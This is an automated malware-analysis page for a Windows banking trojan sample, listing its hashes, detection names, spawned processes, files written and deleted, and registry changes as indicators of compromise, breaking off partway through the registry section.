Trojan-Banker.Win32.Brasil_4dc3d0c729

by malwarelabrobot on May 8th, 2014 in Malware Descriptions.

Trojan.Win32.Badur.gvnz (Kaspersky), Dropped:Trojan.Generic.11176292 (B) (Emsisoft), Dropped:Trojan.Generic.11176292 (AdAware), Trojan-Banker.Win32.Brasil.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4dc3d0c729444611a6a79c50a6c35493
SHA1: d8a92c6781024c67b958f9240ae209017e74e152
SHA256: e54fc6d154a86b2d9e7d173baa7673cfea18e13f34c2712aa3a7745cb0defa80
SSDeep: 12288:OUWA3Aheuswy1oAAOcekSkrHN/g8lCYc9/YeDOLdZ:OUWqist1oQcezAIEeeZ
Size: 549526 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-08-16 14:05:35
Analyzed on: WindowsXP SP3 32-bit


Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan-Banker creates the following process(es):

ImeReg32.exe:1160
setup_2948-140896.exe:2632
axult.exe:1744
MBManager.exe:2480
%original file name%.exe:132
YYSpeed2.exe:2084
setup_qd304.exe:2396
setup_qd304.exe:1972
Mutual.exe:2224
YYMusic2.exe:3844
setup_open_341.:2660
axuls.exe:884
Config.exe:1952
Power.exe:2536
Power.exe:1772
WJSpeed.exe:2880
WJSpeed.exe:3020
ApkReg.exe:2652
wuauclt.exe:540
wjplay.exe:1456

The Trojan-Banker injects its code into the following process(es):

vsgrtaho.exe:1684
WJSpeed.exe:2788

File activity

The process ImeReg32.exe:1160 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%System%\gswb.ime (8657 bytes)

The process setup_2948-140896.exe:2632 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\YYMusic3\2014050713\avutil-52.dll (5520 bytes)
%Program Files%\YYMusic3\2014050713\avcodec-54.dll (23424 bytes)
%Program Files%\YYMusic3\2014050713\Data\dh.ini (56 bytes)
%Program Files%\YYMusic3\2014050713\Data\client.ini (36 bytes)
%Program Files%\YYMusic3\2014050713\Unins.exe (9320 bytes)
%Program Files%\YYMusic3\2014050713\source.dll (6584 bytes)
%Program Files%\YYMusic3\2014050713\audio.dll (3616 bytes)
%Program Files%\YYMusic3\2014050713\pthreadGC2.dll (3616 bytes)
%Program Files%\YYMusic3\2014050713\Data\version.ini (32 bytes)
%Program Files%\YYMusic3\2014050713\Data\user2.ini (22 bytes)
%Program Files%\YYMusic3\2014050713\DuiLib.dll (16288 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\ÅäÖù¤¾ß\жÔØYYMusic3.lnk (830 bytes)
%Program Files%\YYMusic3\2014050713\avformat-54.dll (12088 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\¹Ù·½Ö÷Ò³.lnk (334 bytes)
%Program Files%\YYMusic3\2014050713\YYMusic2.exe (63950 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\YYMusic3\YYMusic3.lnk (835 bytes)
%Program Files%\YYMusic3\2014050713\SysConfig.ini (256 bytes)
%Program Files%\YYMusic3\2014050713\libav.dll (6360 bytes)
%Program Files%\YYMusic3\2014050713\channels.xml (784 bytes)
%Program Files%\YYMusic3\2014050713\favorfm.xml (440 bytes)
%Program Files%\YYMusic3\2014050713\avcore.dll (2392 bytes)
%Program Files%\YYMusic3\2014050713\YYSpeed2.exe (22552 bytes)
%Program Files%\YYMusic3\2014050713\Data\setup.ini (122 bytes)
%Program Files%\YYMusic3\2014050713\swresample-0.dll (3312 bytes)

The process axult.exe:1744 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\vsgrtaho\hzsoft\setup_qd304.exe (47709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup_qd304[1].exe (54004 bytes)

The process MBManager.exe:2480 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.dat (7419 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.dat (7419 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.idx (396 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\wb.usr.idx (588 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.dat (7419 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wb.custom.txt (196 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\UseVestige.ini (58 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.idx (396 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.dat (7419 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\wb.usr.dat (560 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.idx (396 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.idx (2061 bytes)
%Program Files%\gssoft\gswb\Dict\PYPhrases.dat (196 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Config.ini (111712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\py.custom.txt (196 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\py.user.cmp (1993 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\dy.user.cmp (4529 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Config.ini (107405 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\lately.user.cmp (1993 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\position.user.cmp (1993 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\url.user.idx (300 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\MB\url.user.cmp (9639 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Related.ini (210 bytes)
%Program Files%\gssoft\gswb\Dict\WBPhrases.dat (196 bytes)

The Trojan-Banker deletes the following file(s):

%Program Files%\gssoft\gswb\Dict\PYPhrases.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wb.custom.txt (0 bytes)
%Program Files%\gssoft\gswb\Dict\test.tmp (0 bytes)
%Program Files%\gssoft\gswb\Dict\WBPhrases.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\py.custom.txt (0 bytes)

The process %original file name%.exe:132 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\vsgrtaho\dciman32.dll (8 bytes)
%Program Files%\vsgrtaho\d3dim.dll (13480 bytes)
%Program Files%\vsgrtaho\ialmuDAN.dll (1151 bytes)
%Program Files%\vsgrtaho\devmgr.dll (10953 bytes)
%Program Files%\vsgrtaho\dmocx.dll (3576 bytes)
%Program Files%\vsgrtaho\vsgrtaho.exe (8912 bytes)

The Trojan-Banker deletes the following file(s):

%Program Files%\vsgrtaho\__tmp_rar_sfx_access_check_282359 (0 bytes)

The process vsgrtaho.exe:1684 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@t3nlink[1].txt (186 bytes)
%Program Files%\vsgrtaho\axuls.exe (48238 bytes)
%Program Files%\vsgrtaho\axult.exe (42791 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\popup[1].htm (627 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pic[1].gif (719 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_open_341[1].exe (426802 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_2948-140896[1].exe (606444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\axult[1].exe (45478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\yszj_zhimeng_160110[1].exe (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pwb[1].htm (961 bytes)
%Program Files%\vsgrtaho\setup_open_341.exe (324463 bytes)
%Program Files%\vsgrtaho\pwb.dll (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[1].php (801 bytes)
%Program Files%\vsgrtaho\setup_2948-140896.exe (432700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\softcount[1].htm (109 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\axuls[1].exe (49534 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adsvc2.9365[1].txt (321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\stat[1].php (1121 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (5204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Trojan-Banker deletes the following file(s):

%Program Files%\vsgrtaho\pwb.dll (0 bytes)

The process setup_qd304.exe:2396 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\gssoft\gswb\Dict\PYPhrases.dat (6 bytes)
%Program Files%\gssoft\gswb\Dict\Header.dat (2 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\WbUpd.exe (26688 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Skin\¿ìÀÖÅ®º¢.gss (1552 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Tool.exe (22192 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\ImeUtil.exe (60186 bytes)
%Program Files%\gssoft\gswb\Dict\wb.idx (66168 bytes)
%Program Files%\Common Files\gssoft\gssoft.ini (52 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Mutual.exe (25112 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\uninst.exe (11344 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Statistics.dll (19096 bytes)
%Program Files%\gssoft\gswb\Dict\lx.dat (99214 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\gswb32.ime (39329 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Config.exe (37025 bytes)
%Program Files%\gssoft\gswb\Dict\yy.dat (30464 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\wdj_connection_wrapper.dll (12088 bytes)
%Program Files%\gssoft\gswb\Dict\gbk.idx (15168 bytes)
%Program Files%\gssoft\gswb\Dict\url.dat (5 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\WdjRelated.dll (40228 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (209 bytes)
%Program Files%\gssoft\gswb\Dict\yy.idx (100378 bytes)
%Program Files%\gssoft\gswb\Dict\py.s.idx (14184 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\WdjEngine.dll (65930 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Expand.dll (46916 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Skin\À¶É«±ù¸ñ.gss (1552 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\gswb64.ime (60186 bytes)
%Program Files%\gssoft\gswb\˵Ã÷.txt (195 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\ApkReg.exe (15168 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\ImeReg32.exe (7192 bytes)
%Program Files%\gssoft\gswb\Dict\gbk.dat (1856 bytes)
%Program Files%\gssoft\gswb\Dict\py.u.v1.idx (457160 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Power.exe (9608 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\MBManager.exe (35507 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Service.dll (11344 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Wizard.exe (77238 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\WDJDriverPreinstaller.exe (8184 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SkinReg.exe (8560 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\ImeReg64.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu11.tmp (1110700 bytes)
%Program Files%\Common Files\gssoft\gswb\gswb.ini (198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk12.tmp\System.dll (11 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\aapt.exe (197953 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Skin\ÐÝÏÐ.gss (2392 bytes)
%Program Files%\gssoft\gswb\Dict\WBPhrases.dat (6 bytes)
%Program Files%\gssoft\gswb\Dict\wb.dat (19152 bytes)
%Program Files%\gssoft\gswb\Dict\dz.dat (16288 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Skin\»·±£ÂÌ.gss (1552 bytes)

The Trojan-Banker deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk12.tmp\System.dll (0 bytes)

The process setup_qd304.exe:1972 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\metadl.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\setup_qd304.gif.partial (101143 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoE.tmp (8533 bytes)

The Trojan-Banker deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\metadl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\setup_qd304.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp\System.dll (0 bytes)

The process Mutual.exe:2224 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\属性设置.lnk (792 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\设置向导.lnk (792 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\»·±£ÂÌ.gss (42 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\官方网站.url (230 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WdjEngine.dll (14988 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WbUpd.exe (5873 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\SkinReg.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Mutual.exe (5441 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\wdj_connection_wrapper.dll (2105 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Service.dll (1425 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\ÐÝÏÐ.gss (601 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WDJDriverPreinstaller.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\UseVestige.ini (221 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ApkReg.exe (2321 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\gswb32.ime (8657 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\卸载光速输入法.lnk (792 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (734 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Statistics.dll (3361 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Tool.exe (4185 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\gswb64.ime (14022 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\¿ìÀÖÅ®º¢.gss (46 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Skin\À¶É«±ù¸ñ.gss (34 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\ÐÝÏÐ.gss (601 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\SoftApp.ini (281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\¿ìÀÖÅ®º¢.gss (46 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\aapt.exe (45940 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Wizard.exe (17627 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\MBManager.exe (7971 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeReg32.exe (1281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Expand.dll (10815 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\输入法管理器.lnk (797 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\uninst.exe (1425 bytes)
%Program Files%\gssoft\gswb\官方网站.url (230 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeReg64.exe (1281 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\光速软件\光速输入法\在线升级.lnk (785 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Related.ini (208 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\À¶É«±ù¸ñ.gss (34 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Config.ini (308 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Power.exe (1425 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\ImeUtil.exe (14022 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\Config.exe (8281 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\AllSkin\»·±£ÂÌ.gss (42 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Back\WdjRelated.dll (9098 bytes)

The process YYMusic2.exe:3844 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\YYMusic3\2014050713\SysConfig.ini (440 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAY2V666.htm (3 bytes)
%Program Files%\YYMusic3\2014050713\Data\user2.ini (412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tj[1].ashx (3 bytes)
%Program Files%\YYMusic3\2014050713\Data\client.ini (42 bytes)

The Trojan-Banker deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAY2V666.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tj[1].ashx (0 bytes)

The process setup_open_341.:2660 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\wjplay2\20140507132818\Data\Err.html (1 bytes)
%Program Files%\wjplay2\20140507132818\Data\err.jpg (784 bytes)
%Program Files%\wjplay2\20140507132818\Data\def.jpg (1552 bytes)
%Program Files%\wjplay2\20140507132818\Data\User2.ini (60 bytes)
%Program Files%\wjplay2\20140507132818\Unins.exe (10136 bytes)
%Program Files%\wjplay2\20140507132818\Data\wj.ico (784 bytes)
%Program Files%\wjplay2\20140507132818\wjplay.exe (12088 bytes)
%Program Files%\wjplay2\20140507132818\playlist.xml (53 bytes)
%Program Files%\wjplay2\20140507132818\DuiLib.dll (16288 bytes)
%Program Files%\wjplay2\20140507132818\bottom.xml (67 bytes)
%Program Files%\wjplay2\20140507132818\Data\Def.html (902 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\ÅäÖù¤¾ß\жÔØwjplay2.lnk (847 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\¹Ù·½Ö÷Ò³.lnk (332 bytes)
%Program Files%\wjplay2\20140507132818\Data\loading.gif (8 bytes)
%Program Files%\wjplay2\20140507132818\Data\poptime_bg.png (1 bytes)
%Program Files%\wjplay2\20140507132818\locallist.xml (167 bytes)
%Program Files%\wjplay2\20140507132818\client.ini (1 bytes)
%Program Files%\wjplay2\20140507132818\SysConfig.ini (2125 bytes)
%Program Files%\wjplay2\20140507132818\PlayerUpdate.exe (5520 bytes)
%Documents and Settings%\All Users\Desktop\wjplay2.lnk (828 bytes)
%Program Files%\wjplay2\20140507132818\WJSpeed.exe (23424 bytes)
%Program Files%\wjplay2\20140507132818\server.ini (1 bytes)
%Program Files%\wjplay2\20140507132818\stat.ini (1 bytes)
%Program Files%\wjplay2\20140507132818\Data\tab_more.png (4 bytes)
%Program Files%\wjplay2\20140507132818\Data\EKanR.dat (10136 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\wjplay2\wjplay2.lnk (840 bytes)

The Trojan-Banker deletes the following file(s):

C:\ (0 bytes)

The process axuls.exe:884 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\vsgrtaho\hzsoft\IFoxInstall-y-c203945859-run-s-x.exe (9565 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\IFoxInstall-y-c203945859-run-s-x[1].exe (8818 bytes)

The process Config.exe:1952 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\Expand.dll (10815 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)
%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\Service.dll (1425 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Related.ini (34 bytes)
%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\WdjEngine.dll (14988 bytes)
%Program Files%\gssoft\gswb\2.8.1.1120\Config.ini (107092 bytes)
%Documents and Settings%\%current user%\Application Data\gssoft\gswb\Config\Config.ini (107834 bytes)
%Documents and Settings%\%current user%\Application Data\686eae580b7cb0d09a8525ff1a5a4803\3026bf8d9e37080c8abcaaf6df47dbf3.exe (4185 bytes)

The process Power.exe:2536 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)

The process Power.exe:1772 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)

The process WJSpeed.exe:2788 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\tj2[1].ashx (3 bytes)
%Program Files%\wjplay2\20140507132818\SysConfig.ini (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\WJXMDT\DMSet.Xml (215 bytes)

The process ApkReg.exe:2652 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\gssoft\gswb\2.8.1.1120\SoftApp.ini (118 bytes)

The process wuauclt.exe:540 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)

The Trojan-Banker deletes the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)

The process wjplay.exe:1456 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

%Program Files%\wjplay2\20140507132818\Data\User2.ini (380 bytes)
%Program Files%\wjplay2\20140507132818\SysConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\AList[1].xml (62 bytes)

The Trojan-Banker deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\AList[1].xml (0 bytes)

Registry activity

The process ImeReg32.exe:1160 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Keyboard Layout\Preload]
"1" = "00000409"
"2" = "E0200804"

[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Layout File" = "kbdus.dll"
"Ime File" = "GSWB.IME"
"Layout Text" = "中文(简体) - 光速输入法"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Keyboard Layout\Preload]
"1"
"2"

The process setup_2948-140896.exe:2632 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÒôÀÖFM]
"DisplayName" = "YYMusic3"
"Publisher" = "YYMusic3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÒôÀÖFM]
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\YYMusic3]
"RD" = "_2014050713"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 83 3D 27 DA 93 9C EE 59 07 B3 31 9F 42 5D D2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÒôÀÖFM]
